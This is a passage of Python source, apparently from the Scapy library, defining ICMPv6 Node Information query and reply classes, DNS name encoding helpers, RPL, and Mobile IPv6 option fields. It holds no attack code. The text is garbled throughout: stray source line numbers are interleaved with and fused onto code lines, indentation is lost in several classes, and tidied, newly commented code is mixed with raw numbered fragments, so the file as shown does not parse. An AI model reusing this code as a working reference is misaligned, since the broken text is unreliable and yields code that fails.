# Labels displayed for the "qtype" field of Node Information messages.
icmp6_niqtypes = {
    0: "NOOP",
    2: "Node Name",
    3: "IPv6 Address",
    4: "IPv4 Address",
}
2349
2350
class _ICMPv6NIHashret:
    """Mixin hashing a Node Information message on its nonce."""

    def hashret(self):
        nonce = self.nonce
        return bytes_encode(nonce)
2354
2355
2356class _ICMPv6NIAnswers:
2357 def answers(self, other):
2358 return self.nonce == other.nonce
2359
2360# Buggy; always returns the same value during a session
2361
2362
class NonceField(StrFixedLenField):
    """8-byte fixed-length field whose default is drawn from randval()."""

    def __init__(self, name, default=None):
        wants_random = default is None
        StrFixedLenField.__init__(self, name, default, 8)
        if wants_random:
            # Evaluated once, when the field object is created
            self.default = self.randval()
2368
2369
2370@conf.commands.register
def computeNIGroupAddr(name):
    """Compute the NI group Address. Can take a FQDN as input parameter

    Only the first label of ``name`` is used, lower-cased. It is hashed with
    MD5 in DNS label form (one length character followed by the label) and
    the first four digest bytes fill the ``ff02::2:xxxx:xxxx`` template.

    :param name: host name or FQDN (str)
    :returns: the group address as a string
    """
    name = name.lower().split(".")[0]
    record = chr(len(name)) + name
    digest = md5(record.encode("utf8")).digest()
    # Each byte must be rendered as exactly two hex digits: "%2x" pads with
    # a space, which produces an invalid address for bytes below 0x10.
    addr = "ff02::2:%02x%02x:%02x%02x" % struct.unpack("BBBB", digest[:4])
    return addr
2379
2380
2381# Here is the deal. First, that protocol is a piece of shit. Then, we
2382# provide 4 classes for the different kinds of Requests (one for every
2383# valid qtype: NOOP, Node Name, IPv6@, IPv4@). They all share the same
2384# data field class that is made to be smart by guessing the specific
2385# type of value provided :
2386#
2387# - IPv6 if acceptable for inet_pton(AF_INET6, ): code is set to 0,
2388# if not overridden by user
2389# - IPv4 if acceptable for inet_pton(AF_INET, ): code is set to 2,
2390# if not overridden
2391# - Name in the other cases: code is set to 0, if not overridden by user
2392#
# Internal storage is not only the value, but a pair providing
# the type and the value (0 is IPv6@, 1 is Name or string, 2 is IPv4@)
2395#
2396# Note : I merged getfield() and m2i(). m2i() should not be called
2397# directly anyway. Same remark for addfield() and i2m()
2398#
2399# -- arno
2400
2401# "The type of information present in the Data field of a query is
2402# declared by the ICMP Code, whereas the type of information in a
2403# Reply is determined by the Qtype"
2404
def names2dnsrepr(x):
    """
    Take as input a list of DNS names or a single DNS name
    and encode it in DNS format (with possible compression)
    If a string that is already a DNS name in DNS format
    is passed, it is returned unmodified. Result is a bytes string.
    !!! At the moment, compression is not implemented !!!

    Names may be given as bytes or str (str values are UTF-8 encoded).
    A single-label name is terminated by two null bytes, a multi-label
    name by one.
    """

    if isinstance(x, str):
        x = x.encode("utf8")

    if isinstance(x, bytes):
        if x and x[-1:] == b'\x00':  # stupid heuristic
            return x
        x = [x]

    res = []
    for n in x:
        if isinstance(n, str):
            n = n.encode("utf8")
        termin = b"\x00"
        if n.count(b'.') == 0:  # single-component gets one more
            termin += b'\x00'
        # Each label is prefixed by its length on one byte
        n = b"".join(struct.pack("!B", len(y)) + y for y in n.split(b'.')) + termin  # noqa: E501
        res.append(n)
    return b"".join(res)
2427
2428
def dnsrepr2names(x):
    """
    Take as input a DNS encoded bytes string and return the list of DNS
    names (bytes, dot-separated, without trailing dot) contained in it.

    A null byte ends the current name; a second null byte directly after
    it (single-component form) is skipped. A trailing name that is not
    terminated by a null byte is still returned. Compressed names are not
    supported: a label length with one of the two top bits set raises an
    Exception.
    """
    res = []
    cur = b""
    while x:
        tmp_len = x[0]
        x = x[1:]
        if not tmp_len:
            if cur and cur[-1:] == b'.':
                cur = cur[:-1]
            res.append(cur)
            cur = b""
            if x and x[0] == 0:  # single component
                x = x[1:]
            continue
        if tmp_len & 0xc0:  # XXX TODO : work on that -- arno
            raise Exception("DNS message can't be compressed at this point!")
        cur += x[:tmp_len] + b"."
        x = x[tmp_len:]
    if cur:
        # Data ended without a terminating null byte: keep the name that
        # was being read instead of silently dropping it.
        res.append(cur[:-1])
    return res
2455
2456
class NIQueryDataField(StrField):
    """Data field of ICMPv6 Node Information queries.

    The internal value is a ``(kind, value)`` pair where ``kind`` is 0 for
    an IPv6 address, 1 for a DNS-encoded name and 2 for an IPv4 address.
    """

    def __init__(self, name, default):
        StrField.__init__(self, name, default)

    def i2h(self, pkt, x):
        """Return the bare value; names are shown in dotted form."""
        if x is None:
            return x
        t, val = x
        if t == 1:
            # Empty or undecodable name data yields no name at all: fall
            # back to an empty name instead of raising IndexError.
            names = dnsrepr2names(val)
            val = names[0] if names else b""
        return val

    def h2i(self, pkt, x):
        """Guess the kind of ``x`` and return the ``(kind, value)`` pair."""
        # An explicit (kind, value) pair is kept as provided
        if isinstance(x, tuple) and x and isinstance(x[0], int):
            return x

        # Try IPv6
        try:
            inet_pton(socket.AF_INET6, x.decode())
            return (0, x.decode())
        except Exception:
            pass
        # Try IPv4
        try:
            inet_pton(socket.AF_INET, x.decode())
            return (2, x.decode())
        except Exception:
            pass
        # Try DNS
        if x is None:
            x = b""
        x = names2dnsrepr(x)
        return (1, x)

    def i2repr(self, pkt, x):
        t, val = x
        if t == 1:  # DNS Name
            # we don't use dnsrepr2names() to deal with
            # possible weird data extracted info
            res = []
            while val:
                tmp_len = orb(val[0])
                val = val[1:]
                if tmp_len == 0:
                    break
                res.append(plain_str(val[:tmp_len]) + ".")
                val = val[tmp_len:]
            tmp = "".join(res)
            if tmp and tmp[-1] == '.':
                tmp = tmp[:-1]
            return tmp
        return repr(val)

    def getfield(self, pkt, s):
        """Dissect the data according to the packet's qtype and code."""
        qtype = getattr(pkt, "qtype")
        if qtype == 0:  # NOOP
            return s, (0, b"")
        else:
            code = getattr(pkt, "code")
            if code == 0:  # IPv6 Addr
                return s[16:], (0, inet_ntop(socket.AF_INET6, s[:16]))
            elif code == 2:  # IPv4 Addr
                return s[4:], (2, inet_ntop(socket.AF_INET, s[:4]))
            else:  # Name or Unknown
                return b"", (1, s)

    def addfield(self, pkt, s, val):
        """Append the wire form of ``val`` to ``s``."""
        # A missing value is built as an empty name
        if ((isinstance(val, tuple) and val[1] is None) or
                val is None):
            val = (1, b"")
        t = val[0]
        if t == 1:
            return s + val[1]
        elif t == 0:
            return s + inet_pton(socket.AF_INET6, val[1])
        else:
            return s + inet_pton(socket.AF_INET, val[1])
2534
2535
class NIQueryCodeField(ByteEnumField):
    """Code field that is derived from the "data" field when left unset."""

    def i2m(self, pkt, x):
        # An explicit code always wins
        if x is not None:
            return x

        d = pkt.getfieldval("data")
        if d is None:
            return 1

        # data is a (kind, value) pair: 0 is an IPv6 address, 1 a name,
        # 2 an IPv4 address. Anything else is sent as a name query.
        kind = d[0]
        for code in (0, 1, 2):
            if kind == code:
                return code
        return 1
2551
2552
2553_niquery_code = {0: "IPv6 Query", 1: "Name Query", 2: "IPv4 Query"}
2554
2555# _niquery_flags = { 2: "All unicast addresses", 4: "IPv4 addresses",
2556# 8: "Link-local addresses", 16: "Site-local addresses",
2557# 32: "Global addresses" }
2558
2559# "This NI type has no defined flags and never has a Data Field". Used
2560# to know if the destination is up and implements NI protocol.
2561
2562
class ICMPv6NIQueryNOOP(_ICMPv6NIHashret, _ICMPv6):
    # Node Information query with default type 139 and qtype 0. This class
    # also defines the layout reused by the other query classes: code
    # (derived from "data" when None), qtype, 10 unused bits, 6 flag bits,
    # an 8-byte nonce and the data.
    name = "ICMPv6 Node Information Query - NOOP Query"
    fields_desc = [ByteEnumField("type", 139, icmp6types),
                   NIQueryCodeField("code", None, _niquery_code),
                   XShortField("cksum", None),
                   ShortEnumField("qtype", 0, icmp6_niqtypes),
                   BitField("unused", 0, 10),
                   FlagsField("flags", 0, 6, "TACLSG"),
                   NonceField("nonce", None),
                   NIQueryDataField("data", None)]
2573
2574
class ICMPv6NIQueryName(ICMPv6NIQueryNOOP):
    # Same layout as ICMPv6NIQueryNOOP, with qtype defaulting to 2
    # ("Node Name" in icmp6_niqtypes)
    name = "ICMPv6 Node Information Query - IPv6 Name Query"
    qtype = 2
2578
2579# We ask for the IPv6 address of the peer
2580
2581
class ICMPv6NIQueryIPv6(ICMPv6NIQueryNOOP):
    # Same layout as ICMPv6NIQueryNOOP, with qtype defaulting to 3
    # ("IPv6 Address" in icmp6_niqtypes) and flags defaulting to 0x3E,
    # i.e. every flag bit set except the lowest one.
    name = "ICMPv6 Node Information Query - IPv6 Address Query"
    qtype = 3
    flags = 0x3E
2586
2587
class ICMPv6NIQueryIPv4(ICMPv6NIQueryNOOP):
    # Same layout as ICMPv6NIQueryNOOP, with qtype defaulting to 4
    # ("IPv4 Address" in icmp6_niqtypes)
    name = "ICMPv6 Node Information Query - IPv4 Address Query"
    qtype = 4
2591
2592
2593_nireply_code = {0: "Successful Reply",
2594 1: "Response Refusal",
2595 3: "Unknown query type"}
2596
2597_nireply_flags = {1: "Reply set incomplete",
2598 2: "All unicast addresses",
2599 4: "IPv4 addresses",
2600 8: "Link-local addresses",
2601 16: "Site-local addresses",
2602 32: "Global addresses"}
2603
2604# Internal repr is one of those :
2605# (0, "some string") : unknown qtype value are mapped to that one
2606# (3, [ (ttl, ip6), ... ])
2607# (4, [ (ttl, ip4), ... ])
2608# (2, [ttl, dns_names]) : dns_names is one string that contains
2609# all the DNS names. Internally it is kept ready to be sent
2610# (undissected). i2repr() decode it for user. This is to
2611# make build after dissection bijective.
2612#
2613# I also merged getfield() and m2i(), and addfield() and i2m().
2614
2615
class NIReplyDataField(StrField):
    """Data field of ICMPv6 Node Information replies.

    The internal value is a ``(qtype, value)`` pair:
    ``(2, [ttl, dns_encoded_names])``, ``(3, [(ttl, ip6), ...])``,
    ``(4, [(ttl, ip4), ...])`` or ``(0, raw_data)`` for anything else.
    """

    def i2h(self, pkt, x):
        # Human value: the bare value; for names, [ttl, name1, name2, ...]
        if x is None:
            return x
        t, val = x
        if t == 2:
            ttl, dnsnames = val
            val = [ttl] + dnsrepr2names(dnsnames)
        return val

    def h2i(self, pkt, x):
        # Accepts either an explicit (qtype, value) pair or a bare value,
        # in which case the qtype is read from pkt when pkt is available.
        qtype = 0  # We will decode it as string if not
        # overridden through 'qtype' in pkt

        # No user hint, let's use 'qtype' value for that purpose
        if not isinstance(x, tuple):
            if pkt is not None:
                qtype = pkt.qtype
        else:
            qtype = x[0]
            x = x[1]

        # From that point on, x is the value (second element of the tuple)

        if qtype == 2:  # DNS name
            if isinstance(x, (str, bytes)):  # listify the string
                x = [x]
            if isinstance(x, list):
                x = [val.encode() if isinstance(val, str) else val for val in x]  # noqa: E501
            # A leading int in the list is taken as the TTL
            if x and isinstance(x[0], int):
                ttl = x[0]
                names = x[1:]
            else:
                ttl = 0
                names = x
            return (2, [ttl, names2dnsrepr(names)])

        elif qtype in [3, 4]:  # IPv4 or IPv6 addr
            if not isinstance(x, list):
                x = [x]  # User directly provided an IP, instead of list

            def fixvalue(x):
                # List elements are not tuples, user probably
                # omitted ttl value : we will use 0 instead
                if not isinstance(x, tuple):
                    x = (0, x)
                # Decode bytes
                if isinstance(x[1], bytes):
                    x = (x[0], x[1].decode())
                return x

            return (qtype, [fixvalue(d) for d in x])

        return (qtype, x)

    def addfield(self, pkt, s, val):
        # Build the wire form according to the qtype stored in the pair
        t, tmp = val
        if tmp is None:
            tmp = b""
        if t == 2:
            # 32-bit TTL followed by the already DNS-encoded names
            ttl, dnsstr = tmp
            return s + struct.pack("!I", ttl) + dnsstr
        elif t == 3:
            # Sequence of (32-bit TTL, 16-byte IPv6 address) records
            return s + b"".join(map(lambda x_y1: struct.pack("!I", x_y1[0]) + inet_pton(socket.AF_INET6, x_y1[1]), tmp))  # noqa: E501
        elif t == 4:
            # Sequence of (32-bit TTL, 4-byte IPv4 address) records
            return s + b"".join(map(lambda x_y2: struct.pack("!I", x_y2[0]) + inet_pton(socket.AF_INET, x_y2[1]), tmp))  # noqa: E501
        else:
            return s + tmp

    def getfield(self, pkt, s):
        # Data is only interpreted when the reply code is 0; otherwise
        # nothing is consumed and the value is empty.
        code = getattr(pkt, "code")
        if code != 0:
            return s, (0, b"")

        qtype = getattr(pkt, "qtype")
        if qtype == 0:  # NOOP
            return s, (0, b"")

        elif qtype == 2:
            # Needs at least the 4-byte TTL; names are kept undissected
            if len(s) < 4:
                return s, (0, b"")
            ttl = struct.unpack("!I", s[:4])[0]
            return b"", (2, [ttl, s[4:]])

        elif qtype == 3:  # IPv6 addresses with TTLs
            # XXX TODO : get the real length
            res = []
            while len(s) >= 20:  # 4 + 16
                ttl = struct.unpack("!I", s[:4])[0]
                ip = inet_ntop(socket.AF_INET6, s[4:20])
                res.append((ttl, ip))
                s = s[20:]
            return s, (3, res)

        elif qtype == 4:  # IPv4 addresses with TTLs
            # XXX TODO : get the real length
            res = []
            while len(s) >= 8:  # 4 + 4
                ttl = struct.unpack("!I", s[:4])[0]
                ip = inet_ntop(socket.AF_INET, s[4:8])
                res.append((ttl, ip))
                s = s[8:]
            return s, (4, res)
        else:
            # XXX TODO : implement me and deal with real length
            return b"", (0, s)

    def i2repr(self, pkt, x):
        if x is None:
            return "[]"

        if isinstance(x, tuple) and len(x) == 2:
            t, val = x
            if t == 2:  # DNS names
                # tmp_len first holds the encoded names, then the decoded list
                ttl, tmp_len = val
                tmp_len = dnsrepr2names(tmp_len)
                names_list = (plain_str(name) for name in tmp_len)
                return "ttl:%d %s" % (ttl, ",".join(names_list))
            elif t == 3 or t == 4:
                return "[ %s ]" % (", ".join(map(lambda x_y: "(%d, %s)" % (x_y[0], x_y[1]), val)))  # noqa: E501
            return repr(val)
        return repr(x)  # XXX should not happen
2739
2740# By default, sent responses have code set to 0 (successful)
2741
2742
class ICMPv6NIReplyNOOP(_ICMPv6NIAnswers, _ICMPv6NIHashret, _ICMPv6):
    # Node Information reply with default type 140, code 0 and qtype 0.
    # This class also defines the layout reused by the other reply classes:
    # code, qtype, 10 unused bits, 6 flag bits, an 8-byte nonce and the
    # data. Matching and hashing both rely on the nonce (see the mixins).
    name = "ICMPv6 Node Information Reply - NOOP Reply"
    fields_desc = [ByteEnumField("type", 140, icmp6types),
                   ByteEnumField("code", 0, _nireply_code),
                   XShortField("cksum", None),
                   ShortEnumField("qtype", 0, icmp6_niqtypes),
                   BitField("unused", 0, 10),
                   FlagsField("flags", 0, 6, "TACLSG"),
                   NonceField("nonce", None),
                   NIReplyDataField("data", None)]
2753
2754
class ICMPv6NIReplyName(ICMPv6NIReplyNOOP):
    # Same layout as ICMPv6NIReplyNOOP, with qtype defaulting to 2
    name = "ICMPv6 Node Information Reply - Node Names"
    qtype = 2
2758
2759
class ICMPv6NIReplyIPv6(ICMPv6NIReplyNOOP):
    # Same layout as ICMPv6NIReplyNOOP, with qtype defaulting to 3
    name = "ICMPv6 Node Information Reply - IPv6 addresses"
    qtype = 3
2763
2764
class ICMPv6NIReplyIPv4(ICMPv6NIReplyNOOP):
    # Same layout as ICMPv6NIReplyNOOP, with qtype defaulting to 4
    name = "ICMPv6 Node Information Reply - IPv4 addresses"
    qtype = 4
2768
2769
class ICMPv6NIReplyRefuse(ICMPv6NIReplyNOOP):
    # Same layout as ICMPv6NIReplyNOOP, with code defaulting to 1
    name = "ICMPv6 Node Information Reply - Responder refuses to supply answer"
    code = 1
2773
2774
class ICMPv6NIReplyUnknown(ICMPv6NIReplyNOOP):
    # Same layout as ICMPv6NIReplyNOOP, with code defaulting to 2
    name = "ICMPv6 Node Information Reply - Qtype unknown to the responder"
    code = 2
2778
2779
def _niquery_guesser(p):
    """Pick the Node Information class matching the raw ICMPv6 bytes ``p``.

    Queries (type 139) are selected on their qtype, replies (type 140) on
    their code and, for code 0, on their qtype. Anything else, including
    messages of 6 bytes or less, falls back to conf.raw_layer.
    """
    msg_type = orb(p[0])

    if msg_type == 139:  # Node Info Query specific stuff
        if len(p) <= 6:
            return conf.raw_layer
        qtype, = struct.unpack("!H", p[4:6])
        query_classes = {0: ICMPv6NIQueryNOOP,
                         2: ICMPv6NIQueryName,
                         3: ICMPv6NIQueryIPv6,
                         4: ICMPv6NIQueryIPv4}
        return query_classes.get(qtype, conf.raw_layer)

    if msg_type == 140:  # Node Info Reply specific stuff
        code = orb(p[1])
        if code == 1:
            return ICMPv6NIReplyRefuse
        if code == 2:
            return ICMPv6NIReplyUnknown
        if code == 0 and len(p) > 6:
            qtype, = struct.unpack("!H", p[4:6])
            reply_classes = {2: ICMPv6NIReplyName,
                             3: ICMPv6NIReplyIPv6,
                             4: ICMPv6NIReplyIPv4}
            return reply_classes.get(qtype, ICMPv6NIReplyNOOP)

    return conf.raw_layer
2803
2804
2805#############################################################################
2806#############################################################################
2807# Routing Protocol for Low Power and Lossy Networks RPL (RFC 6550) #
2808#############################################################################
2809#############################################################################
2810
2811# https://www.iana.org/assignments/rpl/rpl.xhtml#control-codes
# Labels displayed for the "code" field of RPL control messages.
rplcodes = {
    0: "DIS",
    1: "DIO",
    2: "DAO",
    3: "DAO-ACK",
    # 4: "P2P-DRO",
    # 5: "P2P-DRO-ACK",
    # 6: "Measurement",
    7: "DCO",
    8: "DCO-ACK",
}
2821
2822
class ICMPv6RPL(_ICMPv6):  # RFC 6550
    # ICMPv6 message with default type 155; the code is labelled through
    # rplcodes. When stacked on IPv6, the IPv6 defaults are overloaded with
    # nh=58 and dst=ff02::1a.
    name = 'RPL'
    fields_desc = [ByteEnumField("type", 155, icmp6types),
                   ByteEnumField("code", 0, rplcodes),
                   XShortField("cksum", None)]
    overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1a"}}
2829
2830
2831#############################################################################
2832#############################################################################
2833# Mobile IPv6 (RFC 3775) and Nemo (RFC 3963) #
2834#############################################################################
2835#############################################################################
2836
2837# Mobile IPv6 ICMPv6 related classes
2838
class ICMPv6HAADRequest(_ICMPv6):
    # ICMPv6 message with default type 144: a 16-bit identifier, one "R"
    # bit and 15 reserved bits.
    name = 'ICMPv6 Home Agent Address Discovery Request'
    fields_desc = [ByteEnumField("type", 144, icmp6types),
                   ByteField("code", 0),
                   XShortField("cksum", None),
                   XShortField("id", None),
                   BitEnumField("R", 1, 1, {1: 'MR'}),
                   XBitField("res", 0, 15)]

    def hashret(self):
        # Hash on the 16-bit identifier, then on the payload.
        # NOTE(review): struct.pack() would raise if id is still None here
        # -- confirm callers always set it.
        return struct.pack("!H", self.id) + self.payload.hashret()
2850
2851
class ICMPv6HAADReply(_ICMPv6):
    # ICMPv6 message with default type 145: same header as
    # ICMPv6HAADRequest, followed by a list of IPv6 addresses.
    name = 'ICMPv6 Home Agent Address Discovery Reply'
    fields_desc = [ByteEnumField("type", 145, icmp6types),
                   ByteField("code", 0),
                   XShortField("cksum", None),
                   XShortField("id", None),
                   BitEnumField("R", 1, 1, {1: 'MR'}),
                   XBitField("res", 0, 15),
                   IP6ListField('addresses', None)]

    def hashret(self):
        # Same hash as the request: identifier, then payload
        return struct.pack("!H", self.id) + self.payload.hashret()

    def answers(self, other):
        # Answers a HAAD request carrying the same identifier
        if not isinstance(other, ICMPv6HAADRequest):
            return 0
        return self.id == other.id
2869
2870
class ICMPv6MPSol(_ICMPv6):
    # ICMPv6 message with default type 146: a 16-bit identifier followed by
    # a 16-bit reserved field.
    name = 'ICMPv6 Mobile Prefix Solicitation'
    fields_desc = [ByteEnumField("type", 146, icmp6types),
                   ByteField("code", 0),
                   XShortField("cksum", None),
                   XShortField("id", None),
                   XShortField("res", 0)]

    def hashret(self):
        # Hash on the identifier, like ICMPv6MPAdv.hashret(), so that a
        # solicitation and its advertisement end up with the same hash.
        # An unset identifier (None) is hashed as 0 so this never raises.
        return struct.pack("!H", self.id or 0)

    # The method used to be defined under this misspelled name only, which
    # meant it was never used as the packet's hashret(). Kept as an alias
    # for code that may call it directly.
    _hashret = hashret
2881
2882
class ICMPv6MPAdv(_ICMPv6NDGuessPayload, _ICMPv6):
    # ICMPv6 message with default type 147: a 16-bit identifier, a 2-bit
    # "flags" field and 14 reserved bits.
    name = 'ICMPv6 Mobile Prefix Advertisement'
    fields_desc = [ByteEnumField("type", 147, icmp6types),
                   ByteField("code", 0),
                   XShortField("cksum", None),
                   XShortField("id", None),
                   BitEnumField("flags", 2, 2, {2: 'M', 1: 'O'}),
                   XBitField("res", 0, 14)]

    def hashret(self):
        # Hash on the 16-bit identifier only
        return struct.pack("!H", self.id)

    def answers(self, other):
        # Any Mobile Prefix Solicitation matches; the id is not compared here
        return isinstance(other, ICMPv6MPSol)
2897
2898# Mobile IPv6 Options classes
2899
2900
2901_mobopttypes = {2: "Binding Refresh Advice",
2902 3: "Alternate Care-of Address",
2903 4: "Nonce Indices",
2904 5: "Binding Authorization Data",
2905 6: "Mobile Network Prefix (RFC3963)",
2906 7: "Link-Layer Address (RFC4068)",
2907 8: "Mobile Node Identifier (RFC4283)",
2908 9: "Mobility Message Authentication (RFC4285)",
2909 10: "Replay Protection (RFC4285)",
2910 11: "CGA Parameters Request (RFC4866)",
2911 12: "CGA Parameters (RFC4866)",
2912 13: "Signature (RFC4866)",
2913 14: "Home Keygen Token (RFC4866)",
2914 15: "Care-of Test Init (RFC4866)",
2915 16: "Care-of Test (RFC4866)"}
2916
2917
class _MIP6OptAlign(Packet):
    """Base class of the Mobile IPv6 options, handling their alignment.

    An option must start at an offset of the form x*n+y. Subclasses only
    provide ``x`` and ``y`` as class attributes (both 0 when the option has
    no alignment requirement); alignment_delta() then gives the amount of
    padding (Pad1 or PadN) to insert before the option.
    """

    __slots__ = ["x", "y"]

    def alignment_delta(self, curpos):
        """Return the number of padding bytes needed at offset ``curpos``."""
        step, offset = self.x, self.y
        if step == 0 and offset == 0:
            # No alignment requirement
            return 0
        # Next position >= curpos of the form step * n + offset
        aligned = step * ((curpos - offset + step - 1) // step) + offset
        return aligned - curpos

    def extract_padding(self, p):
        # Nothing is kept as payload: all remaining bytes are handed back
        return b"", p
2937
2938
class MIP6OptBRAdvice(_MIP6OptAlign):
    # Mobility option with default type 2: a 16-bit "rinter" value, hence
    # the default olen of 2.
    name = 'Mobile IPv6 Option - Binding Refresh Advice'
    fields_desc = [ByteEnumField('otype', 2, _mobopttypes),
                   ByteField('olen', 2),
                   ShortField('rinter', 0)]
    x = 2
    y = 0  # alignment requirement: 2n
2946
2947
class MIP6OptAltCoA(_MIP6OptAlign):
    # Mobility option with default type 3: one IPv6 address, hence the
    # default olen of 16.
    name = 'MIPv6 Option - Alternate Care-of Address'
    fields_desc = [ByteEnumField('otype', 3, _mobopttypes),
                   ByteField('olen', 16),
                   IP6Field("acoa", "::")]
    x = 8
    y = 6  # alignment requirement: 8n+6
2955
2956
class MIP6OptNonceIndices(_MIP6OptAlign):
    # Mobility option with default type 4: two 16-bit nonce indices.
    name = 'MIPv6 Option - Nonce Indices'
    fields_desc = [ByteEnumField('otype', 4, _mobopttypes),
                   # The option data is 2 + 2 = 4 bytes. The former default
                   # of 16 announced more data than is actually built.
                   ByteField('olen', 4),
                   ShortField('hni', 0),
                   ShortField('coni', 0)]
    x = 2
    y = 0  # alignment requirement: 2n
2965
2966
class MIP6OptBindingAuthData(_MIP6OptAlign):
    # Mobility option with default type 5: a 96-bit authenticator.
    name = 'MIPv6 Option - Binding Authorization Data'
    fields_desc = [ByteEnumField('otype', 5, _mobopttypes),
                   # The authenticator is 96 bits = 12 bytes. The former
                   # default of 16 announced more data than is built.
                   ByteField('olen', 12),
                   BitField('authenticator', 0, 96)]
    x = 8
    y = 2  # alignment requirement: 8n+2
2974
2975
class MIP6OptMobNetPrefix(_MIP6OptAlign):  # NEMO - RFC 3963
    # Mobility option with default type 6: a reserved byte, a prefix length
    # byte and an IPv6 prefix, hence the default olen of 18.
    name = 'NEMO Option - Mobile Network Prefix'
    fields_desc = [ByteEnumField("otype", 6, _mobopttypes),
                   ByteField("olen", 18),
                   ByteField("reserved", 0),
                   ByteField("plen", 64),
                   IP6Field("prefix", "::")]
    x = 8
    y = 4  # alignment requirement: 8n+4
2985
2986
class MIP6OptLLAddr(_MIP6OptAlign):  # Sect 6.4.4 of RFC 4068
    # Mobility option with default type 7: an option code (labelled through
    # _rfc4068_lla_optcode), a pad byte and a MAC address.
    # NOTE(review): the default olen of 7 is one less than the 8 bytes of
    # ocode + pad + lla -- presumably one of them is excluded from the
    # count by the RFC; confirm.
    name = "MIPv6 Option - Link-Layer Address (MH-LLA)"
    fields_desc = [ByteEnumField("otype", 7, _mobopttypes),
                   ByteField("olen", 7),
                   ByteEnumField("ocode", 2, _rfc4068_lla_optcode),
                   ByteField("pad", 0),
                   MACField("lla", ETHER_ANY)]  # Only support ethernet
    x = 0
    y = 0  # alignment requirement: none
2996
2997
class MIP6OptMNID(_MIP6OptAlign):  # RFC 4283
    """Mobility option of type 8: a subtype byte and a variable ``id``.

    ``olen`` counts the subtype byte plus the identifier, hence the +1 when
    building and the -1 when dissecting.
    """

    name = "MIPv6 Option - Mobile Node Identifier"
    fields_desc = [
        ByteEnumField("otype", 8, _mobopttypes),
        FieldLenField("olen", None, length_of="id", fmt="B",
                      adjust=lambda pkt, id_len: id_len + 1),
        ByteEnumField("subtype", 1, {1: "NAI"}),
        StrLenField("id", "",
                    length_from=lambda pkt: pkt.olen - 1),
    ]
    # alignment requirement: none
    x, y = 0, 0
3008
3009# We only support decoding and basic build. Automatic HMAC computation is
3010# too much work for our current needs. It is left to the user (I mean ...
3011# you). --arno
3012
3013
class MIP6OptMsgAuth(_MIP6OptAlign):  # RFC 4285 (Sect. 5)
    """Mobility option of type 9: subtype, SPI and authentication data.

    ``olen`` covers the subtype byte, the 4-byte ``mspi`` and ``authdata``,
    hence the +5 when building and the -5 when dissecting.
    """

    name = "MIPv6 Option - Mobility Message Authentication"
    fields_desc = [
        ByteEnumField("otype", 9, _mobopttypes),
        FieldLenField("olen", None, length_of="authdata", fmt="B",
                      adjust=lambda pkt, data_len: data_len + 5),
        ByteEnumField("subtype", 1, {
            1: "MN-HA authentication mobility option",
            2: "MN-AAA authentication mobility option",
        }),
        IntField("mspi", None),
        StrLenField("authdata", "A" * 12,
                    length_from=lambda pkt: pkt.olen - 5),
    ]
    # alignment requirement: 4n+1
    x, y = 4, 1
3026
3027# Extracted from RFC 1305 (NTP) :
3028# NTP timestamps are represented as a 64-bit unsigned fixed-point number,
3029# in seconds relative to 0h on 1 January 1900. The integer part is in the
3030# first 32 bits and the fraction part in the last 32 bits.
3031
3032
class NTPTimestampField(LongField):
    """64-bit NTP timestamp with a human readable representation.

    The upper 32 bits hold the seconds elapsed since 0h on 1 January 1900
    and the lower 32 bits hold the fraction of a second.
    """

    def i2repr(self, pkt, x):
        """Render *x* as a UTC date followed by the raw value.

        Values lower than 50 years' worth of seconds after the NTP epoch
        are not converted and get a generic message instead.
        """
        if x < ((50 * 31536000) << 32):
            return "Some date a few decades ago (%d)" % x

        # Seconds between the NTP epoch (1900-01-01 00:00:00 UTC) and the
        # Unix epoch (1970-01-01 00:00:00 UTC): 70 years including 17 leap
        # days. The previous constant (2209075761) was 86961 seconds too
        # large, which shifted every rendered date by more than a day.
        ntp_to_unix = 2208988800

        seconds = int(x >> 32)
        fraction = float(x & 0xffffffff) * 2.0**-32
        unix_time = seconds + fraction - ntp_to_unix
        t = strftime("%a, %d %b %Y %H:%M:%S +0000", gmtime(unix_time))

        return "%s (%d)" % (t, x)
3047
3048
class MIP6OptReplayProtection(_MIP6OptAlign):  # RFC 4285 (Sect. 6)
    """Mobility option of type 10: a single 64-bit NTP timestamp."""

    name = "MIPv6 option - Replay Protection"
    fields_desc = [
        ByteEnumField("otype", 10, _mobopttypes),
        ByteField("olen", 8),
        NTPTimestampField("timestamp", 0),
    ]
    # alignment requirement: 8n+2
    x, y = 8, 2
3056
3057
class MIP6OptCGAParamsReq(_MIP6OptAlign):  # RFC 4866 (Sect. 5.6)
    """Mobility option of type 11: type and length only, no data."""

    name = "MIPv6 option - CGA Parameters Request"
    fields_desc = [
        ByteEnumField("otype", 11, _mobopttypes),
        ByteField("olen", 0),
    ]
    # alignment requirement: none
    x, y = 0, 0
3064
3065# XXX TODO: deal with CGA param fragmentation and build of defragmented
3066# XXX version. Passing of a big CGAParam structure should be
3067# XXX simplified. Make it hold packets, by the way --arno
3068
3069
class MIP6OptCGAParams(_MIP6OptAlign):  # RFC 4866 (Sect. 5.1)
    """Mobility option of type 12: ``olen`` bytes of opaque ``cgaparams``."""

    name = "MIPv6 option - CGA Parameters"
    fields_desc = [
        ByteEnumField("otype", 12, _mobopttypes),
        FieldLenField("olen", None, length_of="cgaparams", fmt="B"),
        StrLenField("cgaparams", "",
                    length_from=lambda opt: opt.olen),
    ]
    # alignment requirement: none
    x, y = 0, 0
3078
3079
class MIP6OptSignature(_MIP6OptAlign):  # RFC 4866 (Sect. 5.2)
    """Mobility option of type 13: ``olen`` bytes of opaque ``sig``."""

    name = "MIPv6 option - Signature"
    fields_desc = [
        ByteEnumField("otype", 13, _mobopttypes),
        FieldLenField("olen", None, length_of="sig", fmt="B"),
        StrLenField("sig", "",
                    length_from=lambda opt: opt.olen),
    ]
    # alignment requirement: none
    x, y = 0, 0
3088
3089
class MIP6OptHomeKeygenToken(_MIP6OptAlign):  # RFC 4866 (Sect. 5.3)
    """Mobility option of type 14: ``olen`` bytes of opaque ``hkt``."""

    name = "MIPv6 option - Home Keygen Token"
    fields_desc = [
        ByteEnumField("otype", 14, _mobopttypes),
        FieldLenField("olen", None, length_of="hkt", fmt="B"),
        StrLenField("hkt", "",
                    length_from=lambda opt: opt.olen),
    ]
    # alignment requirement: none
    x, y = 0, 0
3098
3099
class MIP6OptCareOfTestInit(_MIP6OptAlign):  # RFC 4866 (Sect. 5.4)
    """Mobility option of type 15: type and length only, no data."""

    name = "MIPv6 option - Care-of Test Init"
    fields_desc = [
        ByteEnumField("otype", 15, _mobopttypes),
        ByteField("olen", 0),
    ]
    # alignment requirement: none
